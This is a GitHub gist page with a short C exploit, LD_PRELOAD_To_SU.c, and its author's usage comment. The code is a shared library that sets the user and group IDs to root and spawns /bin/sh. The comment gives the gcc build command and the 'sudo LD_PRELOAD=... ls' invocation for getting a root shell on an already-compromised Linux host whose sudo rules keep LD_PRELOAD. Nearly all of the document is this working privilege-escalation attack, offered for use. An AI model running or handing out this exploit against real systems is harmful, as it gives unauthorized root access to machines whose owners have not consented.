MoElaSec/LD_PRELOAD_To_SU.c

Created January 2, 2022 14:38

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/MoElaSec/ddd7df3805c86515a1baf7efe4289814.js"></script>
Save MoElaSec/ddd7df3805c86515a1baf7efe4289814 to your computer and use it in GitHub Desktop.

Download ZIP

Raw

LD_PRELOAD_To_SU.c

	#include <stdio.h>
	#include <sys/types.h>
	#include <stdlib.h>
	void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/sh");
	}

Author

MoElaSec commented Jan 2, 2022

Privilege escalation

You exploited a Linux target but the user is not root however sudo -l shows LD_PRELOAD can execute ls (or whatever) as root without password.
save this script and use the command with it ls shell.c

Note: attribute((constructor)) is better as _init func is obsolete

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
file shell.so

id
sudo LD_PRELOAD=/home/<user>/shell.so ls
id

make sure to use the right user

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment